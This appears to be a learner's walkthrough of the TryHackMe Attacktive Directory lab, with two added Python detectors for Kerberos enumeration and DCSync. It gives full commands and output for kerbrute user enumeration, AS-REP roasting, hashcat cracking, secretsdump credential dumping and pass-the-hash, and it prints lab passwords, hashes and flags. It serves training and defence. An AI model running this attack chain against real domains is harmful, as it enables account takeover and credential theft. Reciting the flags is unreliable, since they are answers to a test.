Introduction
These are my notes. I'm skipping Tasks 1 and 2 and starting from Task 3.
Task 3 [Welcome to Attacktive Directory]
What tool will allow us to enumerate port 139/445?
Looking into ports 139 and 445: both are used by SMB (Server Message Block), the standard Windows protocol for file and printer sharing.
Reference:
Because Windows networking features are a frequent target of cyber attacks, unless they are absolutely needed for some reason, ports 445 and 137 to 139 should be configured on routers and firewalls so that they cannot be reached from the Internet side into the internal network.
So they're apparently a common attack target.
Googling "port 139 445 enumerate" turns up enum4linux, a tool for extracting information from Windows and Samba hosts.
enum4linux
What is the NetBIOS-Domain Name of the machine?
Since it looks like we'll be using enum4linux, first confirm with nmap that the ports are open.
nmap -A 10.10.159.205
Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-11 02:28 BST
Nmap scan report for ip-10-10-159-205.eu-west-1.compute.internal (10.10.159.205)
Host is up (0.0021s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-11 01:29:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2024-07-10T01:04:28
|_Not valid after: 2025-01-09T01:04:28
|_ssl-date: 2024-07-11T01:30:13+00:00; -1s from scanner time.
(rest omitted)
Both 139 and 445 were open.
$ enum4linux 10.10.159.205
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jul 11 02:37:05 2024
==========================
| Target Information |
==========================
Target ........... 10.10.159.205
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.10.159.205 |
=====================================================
[+] Got domain/workgroup name: THM-AD
=============================================
| Nbtstat Information for 10.10.159.205 |
=============================================
Looking up status of 10.10.159.205
ATTACKTIVEDIREC <00> - B <ACTIVE> Workstation Service
THM-AD <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
THM-AD <1c> - <GROUP> B <ACTIVE> Domain Controllers
THM-AD <1b> - B <ACTIVE> Domain Master Browser
ATTACKTIVEDIREC <20> - B <ACTIVE> File Server Service
MAC Address = 02-F1-30-43-D5-17
======================================
| Session Check on 10.10.159.205 |
======================================
[+] Server 10.10.159.205 allows sessions using username '', password ''
============================================
| Getting domain SID for 10.10.159.205 |
============================================
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
=======================================
| OS information on 10.10.159.205 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
[+] Got OS info for 10.10.159.205 from smbclient:
[+] Got OS info for 10.10.159.205 from srvinfo:
Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
(rest omitted)
Found it!
[+] Got domain/workgroup name: THM-AD
THM-AD
What invalid TLD do people commonly use for their Active Directory Domain?
TLD stands for top-level domain; .com and .jp are TLDs.
Active Directory requires a domain, and if you don't own your own domain you end up tacking on .local.
.local
Task 4 [Enumerating Users via Kerberos]
What command within Kerbrute will allow us to enumerate valid usernames?
First, download kerbrute.
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
The downloaded file has no execute permission, so grant it.
chmod 700 kerbrute_linux_amd64
Check how to use it.
$ ./kerbrute_linux_amd64 -h
Version: v1.0.3 (9dad6e1) - 07/11/24 - Ronnie Flathers @ropnop
This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts
Usage:
kerbrute [command]
Available Commands:
bruteforce Bruteforce username:password combos, from a file or stdin
bruteuser Bruteforce a single user's password from a wordlist
help Help about any command
passwordspray Test a single password against a list of users
userenum Enumerate valid domain usernames via Kerberos
version Display version info and quit
Flags:
--dc string The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
--delay int Delay in millisecond between each attempt. Will always use single thread if set
-d, --domain string The full domain to use (e.g. contoso.com)
-h, --help help for kerbrute
-o, --output string File to write logs to. Optional.
--safe Safe mode. Will abort if any user comes back as locked out. Default: FALSE
-t, --threads int Threads to use (default 10)
-v, --verbose Log failures and errors
Use "kerbrute [command] --help" for more information about a command.
It's listed on GitHub as well.
userenum
The target machine terminated partway through, so the target IP changed to 10.10.179.67.
What notable account is discovered? (These should jump out at you)
Enumerate accounts using the provided user list.
The user list could be downloaded from here.
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
This should do the enumeration.
./kerbrute_linux_amd64 userenum --dc [target IP] -d spookysec.local [user_list_path] -t 50
./kerbrute_linux_amd64 userenum --dc 10.10.179.67 -d spookysec.local /root/userlist.txt -t 50
2024/07/11 06:40:43 > Using KDC(s):
2024/07/11 06:40:43 > 10.10.179.67:88
2024/07/11 06:40:43 > [+] VALID USERNAME: james@spookysec.local
2024/07/11 06:40:43 > [+] VALID USERNAME: svc-admin@spookysec.local
2024/07/11 06:40:43 > [+] VALID USERNAME: James@spookysec.local
2024/07/11 06:40:43 > [+] VALID USERNAME: robin@spookysec.local
2024/07/11 06:40:43 > [+] VALID USERNAME: darkstar@spookysec.local
2024/07/11 06:40:44 > [+] VALID USERNAME: administrator@spookysec.local
2024/07/11 06:40:44 > [+] VALID USERNAME: backup@spookysec.local
2024/07/11 06:40:44 > [+] VALID USERNAME: paradox@spookysec.local
2024/07/11 06:40:46 > [+] VALID USERNAME: JAMES@spookysec.local
2024/07/11 06:40:46 > [+] VALID USERNAME: Robin@spookysec.local
2024/07/11 06:40:52 > [+] VALID USERNAME: Administrator@spookysec.local
2024/07/11 06:41:08 > [+] VALID USERNAME: Darkstar@spookysec.local
2024/07/11 06:41:13 > [+] VALID USERNAME: Paradox@spookysec.local
2024/07/11 06:41:29 > [+] VALID USERNAME: DARKSTAR@spookysec.local
2024/07/11 06:41:34 > [+] VALID USERNAME: ori@spookysec.local
2024/07/11 06:41:43 > [+] VALID USERNAME: ROBIN@spookysec.local
2024/07/11 06:42:04 > Done! Tested 73317 usernames (16 valid) in 81.200 seconds
Quite a lot came back.
There are several admins, too.
Entering the one that fits the character count is a hit!
svc-admin
What is the other notable account discovered? (These should jump out at you)
The answer is six characters, and there was only one six-character account.
backup
Task 5 [Abusing Kerberos]
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
Looking at the character count of the answer box gave the answer away.
Active Directory uses Kerberos authentication. When a user account has the "Do not require Kerberos preauthentication" option set, an attack technique called AS-REP Roasting can abuse functionality within Kerberos.
To use AS-REP Roasting, check whether that option is set with Impacket's GetNPUsers.py. GetNPUsers.py queries the Key Distribution Center for AS-REP roastable accounts and obtains the TGT reply (AS-REP) for them.
GetNPUsers.py -no-pass -dc-ip 10.10.179.67 spookysec.local/backup
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Getting TGT for backup
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
No luck.
GetNPUsers.py -no-pass -dc-ip 10.10.179.67 spookysec.local/svc-admin
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:9a639feaf9b26c2584f89a7fa5f0d89a$f2b2471556ff0029542dffbd643f5ef2ab6bd779f257df6566c2f4831b5dffa0983f597390e081fa902fffc07af960abf589d3bc582976fc473b9d4bf6f1ffa83cc000218a80169eb225712645e62e464ebff21d3405a1f15a922e6bc7f3016c6001d0eca37d770584d5bcd759d27ef9256cf8116e3df7cd7a27336bda5c32ba4c46f47258a5c9ff1ffeade19b0d0e46d3e2c0e3829cb4e5691388722b894fda7eff7644ae5126689eb27a1144871896ad0b4a601b25d1954b254ca28af60721a2f94fbaa15b0206131c050f6dc31b050464b2fe37eae95018a41bb10451dd949d2d7d30f95137f303db83534818bb47a3e4
Bingo.
svc-admin
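An added detection-side example, not part of the original write-up: a Python triage over constructed Event ID 4768 (Kerberos TGT request) records that covers both the kerbrute userenum from Task 4 and the no-pre-auth ticket request above. The window and threshold values are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Event ID 4768 records (not real logs). Fields mirror the
# event's data names: TargetUserName, IpAddress, Status, PreAuthType,
# TicketEncryptionType. One client sprays unknown names (Status 0x6 =
# KDC_ERR_C_PRINCIPAL_UNKNOWN, what kerbrute userenum leaves behind for
# invalid names), then gets a ticket for svc-admin without pre-auth.
SAMPLE_4768 = [
    ("2024-07-11 06:40:43", "aaron",     "::ffff:10.10.14.5", "0x6", "-", "0xffffffff"),
    ("2024-07-11 06:40:43", "abby",      "::ffff:10.10.14.5", "0x6", "-", "0xffffffff"),
    ("2024-07-11 06:40:43", "Adam",      "::ffff:10.10.14.5", "0x6", "-", "0xffffffff"),
    ("2024-07-11 06:40:44", "ADAM",      "::ffff:10.10.14.5", "0x6", "-", "0xffffffff"),
    ("2024-07-11 06:40:44", "alice",     "::ffff:10.10.14.5", "0x6", "-", "0xffffffff"),
    ("2024-07-11 06:40:44", "amanda",    "::ffff:10.10.14.5", "0x6", "-", "0xffffffff"),
    ("2024-07-11 06:40:45", "andrew",    "::ffff:10.10.14.5", "0x6", "-", "0xffffffff"),
    ("2024-07-11 06:41:02", "james",     "::ffff:10.10.14.5", "0x0", "2", "0x12"),  # normal logon (PA-ENC-TIMESTAMP, AES256)
    ("2024-07-11 06:42:10", "svc-admin", "::ffff:10.10.14.5", "0x0", "0", "0x17"),  # no pre-auth, RC4
    ("2024-07-11 07:15:00", "jsmith",    "::ffff:10.10.50.2", "0x6", "-", "0xffffffff"),  # single typo, benign
]

ENUM_WINDOW = timedelta(seconds=60)  # assumption: tune per environment
ENUM_THRESHOLD = 5                   # distinct unknown names from one IP inside the window


def parse_4768(rec):
    ts, user, ip, status, preauth, etype = rec
    return {"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "user": user,
            "ip": ip.removeprefix("::ffff:"), "status": status.lower(),
            "preauth": preauth, "etype": etype.lower()}


def detect_user_enumeration(records, window=ENUM_WINDOW, threshold=ENUM_THRESHOLD):
    """Map source IP -> sorted distinct unknown names for IPs that hit the threshold.

    Names are lower-cased so case variants (james/James/JAMES, as in the kerbrute
    output above) count once, the way the KDC treats them."""
    by_ip = defaultdict(list)
    for r in map(parse_4768, records):
        if r["status"] == "0x6":
            by_ip[r["ip"]].append(r)
    hits = {}
    for ip, evts in by_ip.items():
        evts.sort(key=lambda r: r["ts"])
        for i, first in enumerate(evts):  # sliding window over the failures
            names = {r["user"].lower() for r in evts[i:] if r["ts"] - first["ts"] <= window}
            if len(names) >= threshold:
                hits[ip] = sorted(names)
                break
    return hits


def detect_no_preauth_tickets(records):
    """Successful AS-REQs with PreAuthType 0: the account answered without
    pre-auth, so its AS-REP can be taken offline. etype 0x17 (RC4) is hashcat 18200."""
    return [(r["user"], r["ip"], r["etype"]) for r in map(parse_4768, records)
            if r["status"] == "0x0" and r["preauth"] == "0"]


if __name__ == "__main__":
    for ip, names in detect_user_enumeration(SAMPLE_4768).items():
        print(f"[enum] {ip} probed {len(names)} unknown names: {', '.join(names)}")
    for user, ip, etype in detect_no_preauth_tickets(SAMPLE_4768):
        print(f"[asrep] {user} got a ticket without pre-auth (etype {etype}) from {ip}")
```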
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
https://hashcat.net/wiki/doku.php?id=example_hashes and searching for the first part will help!
As the hint says, search the hashcat wiki for the first part of the ticket obtained earlier.
Found it.
18200 Kerberos 5, etype 23, AS-REP $krb5asrep$23$user@domain.com:3e156ada591263b8aab0965f5aebd837$007497cb51b6c8116d6407a782ea0e1c5402b17db7afa6b05a6d30ed164a9933c754d720e279c6c573679bd27128fe77e5fea1f72334c1193c8ff0b370fadc6368bf2d49bbfdba4c5dccab95e8c8ebfdc75f438a0797dbfb2f8a1a5f4c423f9bfc1fea483342a11bd56a216f4d5158ccc4b224b52894fadfba3957dfe4b6b8f5f9f9fe422811a314768673e0c924340b8ccb84775ce9defaa3baa0910b676ad0036d13032b0dd94e3b13903cc738a7b6d00b0b3c210d1f972a6c7cae9bd3c959acf7565be528fc179118f28c679f6deeee1456f0781eb8154e18e49cb27b64bf74cd7112a0ebae2102ac
Kerberos 5, etype 23, AS-REP
What mode is the hash?
The left column of that hashcat table is apparently the mode.
18200
Now crack the hash with the modified password list provided, what is the user account's password?
Now that we know the hash type, crack the password with hashcat.
A password list was already provided, so use that too.
Also, create a file and write the hash obtained earlier into it.
wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
nano hash.txt and paste in the hash from earlier
Run hashcat!
$ hashcat -m 18200 hash.txt passwordlist.txt --force
hashcat (v6.1.1-66-g6a419d06) starting...
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 1.2 LINUX) - Platform #1 [Intel(R) Corporation]
==================================================================
* Device #1: AMD EPYC 7571, 3832/3896 MB (974 MB allocatable), 2MCU
OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
===========================================================================================================================
* Device #2: pthread-AMD EPYC 7571, skipped
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 35 MB
Dictionary cache built:
* Filename..: passwordlist.txt
* Passwords.: 70188
* Bytes.....: 569236
* Keyspace..: 70188
* Runtime...: 0 secs
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:9a639feaf9b26c2584f89a7fa5f0d89a$f2b2471556ff0029542dffbd643f5ef2ab6bd779f257df6566c2f4831b5dffa0983f597390e081fa902fffc07af960abf589d3bc582976fc473b9d4bf6f1ffa83cc000218a80169eb225712645e62e464ebff21d3405a1f15a922e6bc7f3016c6001d0eca37d770584d5bcd759d27ef9256cf8116e3df7cd7a27336bda5c32ba4c46f47258a5c9ff1ffeade19b0d0e46d3e2c0e3829cb4e5691388722b894fda7eff7644ae5126689eb27a1144871896ad0b4a601b25d1954b254ca28af60721a2f94fbaa15b0206131c050f6dc31b050464b2fe37eae95018a41bb10451dd949d2d7d30f95137f303db83534818bb47a3e4:management2005
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:9a639feaf9b...47a3e4
Time.Started.....: Thu Jul 11 08:58:59 2024, (0 secs)
Time.Estimated...: Thu Jul 11 08:58:59 2024, (0 secs)
Guess.Base.......: File (passwordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 362.2 kH/s (7.41ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 8192/70188 (11.67%)
Rejected.........: 0/8192 (0.00%)
Restore.Point....: 4096/70188 (5.84%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: newzealand -> whitey
Started: Thu Jul 11 08:58:13 2024
Stopped: Thu Jul 11 08:59:00 2024
Cracked successfully. Now I want some hash browns.
management2005
Task 6 [Back to the Basics]
What utility can we use to map remote SMB shares?
Hint : man smbclient will tell you a little bit about the tool!
They told us outright.
smbclient
Which option will list shares?
Googled it.
-L
How many remote shares is the server listing?
Run smbclient to list the services available on the server.
smbclient -L 10.10.179.67 -U svc-admin%management2005
WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.179.67 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
6
There is one particular share that we have access to that contains a text file. Which share is it?
backup looks suspicious.
$ smbclient \\\\10.10.179.67\\backup -U 'svc-admin'
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 20:08:39 2020
.. D 0 Sat Apr 4 20:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 20:08:53 2020
8247551 blocks of size 4096. 4118567 blocks available
Got in. There's something here.
backup
What is the content of the file?
Get the file and look at its contents.
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \> q
root@ip-10-10-142-28:~# cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYwr
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYwr
Decoding the contents of the file, what is the full contents?
The hint for the previous question says the file contents are encoded.
Try decoding it as base64.
$ base64 -d backup_credentials.txt
backup@spookysec.local:backup2517860
backup@spookysec.local:backup2517860
Task 7 [Elevating Privileges within the Domain]
What method allowed us to dump NTDS.DIT?
Summary of the task description
The backup account obtained earlier is the backup account for the domain controller. This account has a unique permission that lets all Active Directory changes be synced with this user account, and that includes password hashes.
Knowing that, we can use another Impacket tool, secretsdump.py. With it, this user account (which syncs with the domain controller) can be used to retrieve every password hash it has access to, which effectively gives full control of the AD domain.
I don't really follow what that means. Try Harder!
Anyway, grab secretsdump.py and run it.
$ wget https://raw.githubusercontent.com/fortra/impacket/master/examples/secretsdump.py
$ secretsdump.py -just-dc backup:backup2517860@10.10.34.196
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:2e083a5eb7dbeb20c46047a186a52e72:::
[*] Kerberos keys grabbed
[*] Cleaning up...
The answer is the last hash field on the Administrator:500 line (the nthash column).
0e0363213e37b94221497260b0bcb4fc
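An added detection example, not from the write-up or from Impacket: the standard way to spot what secretsdump.py -just-dc does (a DRSUAPI replication request from an ordinary account), run over constructed Event ID 4662 records. It assumes "Audit Directory Service Access" is enabled with a SACL on the domain object, and takes the domain controller machine-account allowlist as a parameter.

```python
import re

# Replication control-access rights exercised by a DCSync-style request
# (GUIDs from the AD schema extended rights).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100
DOMAIN_DNS = "19195a5b-6da0-11d0-afd3-00c04fd930c9"  # domainDNS object class
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Constructed sample Event ID 4662 records (not real logs). Keys follow the
# event's data names; Properties is the multi-line string the event carries.
SAMPLE_4662 = [
    {"SubjectUserName": "ATTACKTIVEDIREC$", "SubjectDomainName": "THM-AD",
     "ObjectType": f"%{{{DOMAIN_DNS}}}", "AccessMask": "0x100",
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   f"{{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}}\n{{{DOMAIN_DNS}}}"},  # DC-to-DC replication
    {"SubjectUserName": "backup", "SubjectDomainName": "THM-AD",
     "ObjectType": f"%{{{DOMAIN_DNS}}}", "AccessMask": "0x100",
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   f"{{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}}\n{{{DOMAIN_DNS}}}"},  # user account pulling secrets
    {"SubjectUserName": "svc-admin", "SubjectDomainName": "THM-AD",
     "ObjectType": f"%{{{DOMAIN_DNS}}}", "AccessMask": "0x10",  # read property only
     "Properties": f"%%7688\n{{{DOMAIN_DNS}}}"},
]


def replication_rights_used(event):
    """Names of replication control-access rights exercised in one 4662 event."""
    if (int(event["AccessMask"], 16) & ADS_RIGHT_DS_CONTROL_ACCESS) == 0:
        return []
    guids = {g.lower() for g in GUID_RE.findall(event["Properties"])}
    return sorted(REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS)


def dcsync_alerts(events, dc_accounts):
    """(subject, rights) for non-DC principals that pulled replication data.

    dc_accounts is the allowlist of domain controller machine accounts; DC-to-DC
    replication legitimately produces the same event and would otherwise flood."""
    allow = {a.lower() for a in dc_accounts}
    alerts = []
    for ev in events:
        rights = replication_rights_used(ev)
        if rights and ev["SubjectUserName"].lower() not in allow:
            alerts.append((f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}', rights))
    return alerts


if __name__ == "__main__":
    for subject, rights in dcsync_alerts(SAMPLE_4662, {"ATTACKTIVEDIREC$"}):
        print(f"[dcsync] {subject} used {', '.join(rights)} on the domain object")
```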
What method of attack could allow us to authenticate as the user without the password?
Googled it.
Pass The Hash
Using a tool called Evil-WinRM what option will allow us to use a hash?
Evil-WinRM, what an evil-sounding name.
Install it.
Note that -h gives you the help text instead.
-H
Task 8 Flag Submission Panel
The order of the questions is shuffled here. Also, the target IP changed again.
Administrator
Use evil-winrm to explore as Administrator.
evil-winrm -i 10.10.160.40 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
Moving to the Desktop, there was root.txt.
TryHackMe{4ctiveD1rectoryM4st3r}
svc-admin
From here it's easy.
user.txt.txt was on svc-admin's Desktop.
TryHackMe{K3rb3r0s_Pr3_4uth}
backup
Last one! That was long...
PrivEsc.txt was on the Desktop.
TryHackMe{B4ckM3UpSc0tty!}
Thoughts
This was my first time attacking AD.
I had no idea what I was doing...
Try Harder!